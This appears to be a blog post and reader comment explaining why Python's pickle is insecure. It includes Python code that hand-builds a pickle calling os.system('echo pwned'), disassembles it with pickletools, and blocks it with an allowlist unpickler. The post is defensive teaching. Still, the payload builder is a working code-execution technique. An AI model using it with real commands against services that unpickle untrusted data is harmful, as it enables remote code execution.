Why Python Pickle is Insecure. Because pickle is essentially a stack-based interpreter: the unpickler executes a stream of opcodes, and one of them (REDUCE) calls whatever callable is on the stack with whatever arguments sit beneath it. A crafted pickle can therefore push os.system and a command string and use them to execute arbitrary commands on the machine that unpickles it.
Which is documented very clearly here: http://docs.python.org/library/pickle.html
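The following is an added example written for this page; it is not code from the original post, the linked article, or the Python documentation. It hand-assembles the protocol-0 opcode stream described above (GLOBAL to push a callable, MARK/UNICODE/TUPLE to build its arguments, REDUCE to call it), shows how the stdlib's pickletools exposes that structure, and contrasts plain pickle.loads with the find_class allowlist pattern the pickle docs recommend. The helper names craft_payload, disassemble, RestrictedUnpickler, safe_loads and the demo functions are my own; the "echo pwned" command is a constructed, harmless sample.

```python
import io
import os
import pickle
import pickletools


def craft_payload(module: str, name: str, *args: str) -> bytes:
    """Hand-assemble a protocol-0 pickle that calls module.name(*args).

    This is byte-for-byte the shape pickle.dumps() emits for an object whose
    __reduce__ returns (callable, args); writing it by hand makes the stack
    machine visible. Arguments must not contain newlines (protocol-0 strings
    are newline-terminated).
    """
    ops = [f"c{module}\n{name}\n".encode()]  # GLOBAL: import module.name, push it
    ops.append(b"(")                           # MARK: remember where the args begin
    for arg in args:
        ops.append(b"V" + arg.encode("raw_unicode_escape") + b"\n")  # UNICODE: push str
    ops.append(b"t")                           # TUPLE: pop back to MARK, push tuple
    ops.append(b"R")                           # REDUCE: pop tuple and callable, call it
    ops.append(b".")                           # STOP: the call's result is the "object"
    return b"".join(ops)


def disassemble(payload: bytes) -> str:
    """Return pickletools' opcode listing, the quickest triage for suspect pickles."""
    out = io.StringIO()
    pickletools.dis(payload, out=out)
    return out.getvalue()


# --- the unsafe side: plain pickle.loads runs whatever GLOBAL+REDUCE names ---

def prove_execution() -> bool:
    """Use a side-effect-free callable (os.getcwd) to show REDUCE really calls it.

    Swap "getcwd" for "system" and add a command argument and the very same
    opcode sequence runs a shell command; see the __main__ block.
    """
    return pickle.loads(craft_payload("os", "getcwd")) == os.getcwd()


# --- the hardened side: refuse every global that is not explicitly allowed ---

class RestrictedUnpickler(pickle.Unpickler):
    # Allowlist of (module -> names) that find_class may resolve. Everything
    # else, including os.system, builtins.eval and any user class, is refused.
    ALLOWED = {"builtins": {"dict", "list", "tuple", "set", "frozenset"}}

    def find_class(self, module: str, name: str):
        if name in self.ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Drop-in for pickle.loads that routes every GLOBAL through the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_blocked(payload: bytes) -> bool:
    """True if the allowlisted unpickler refuses the payload (no callable ran)."""
    try:
        safe_loads(payload)
    except pickle.UnpicklingError:
        return True
    return False


def roundtrip_benign():
    """Ordinary data still loads: containers use dedicated opcodes, not GLOBAL."""
    return safe_loads(pickle.dumps({"user": "alice", "roles": ["admin", "dev"]}))


if __name__ == "__main__":
    evil = craft_payload("os", "system", "echo pwned")   # constructed sample command
    print(disassemble(evil))            # GLOBAL 'os system' ... REDUCE ... STOP
    pickle.loads(evil)                  # runs `echo pwned` in a shell
    print("restricted loader blocked it:", is_blocked(evil))
```

Note what the allowlist does and does not buy you: it stops GLOBAL from resolving os.system, but a loader that still allows arbitrary classes from your own code base is only as safe as those classes' __setstate__ and __reduce__ methods, so keep the list short and prefer a data-only format such as JSON for anything that crosses a trust boundary.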
I think it's well worth talking about the reason for the warning. The docs just say: "The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source." Explaining that this actually means you can execute arbitrary OS level commands makes it far more likely people will take that warning seriously.
You might want to look at json-pickle. It may have the same problems but it's at least easier to read.
http://jsonpickle.googlecode.com/svn/docs/index.html
Paul Hildebrandt - 10th September 2009 21:36 - #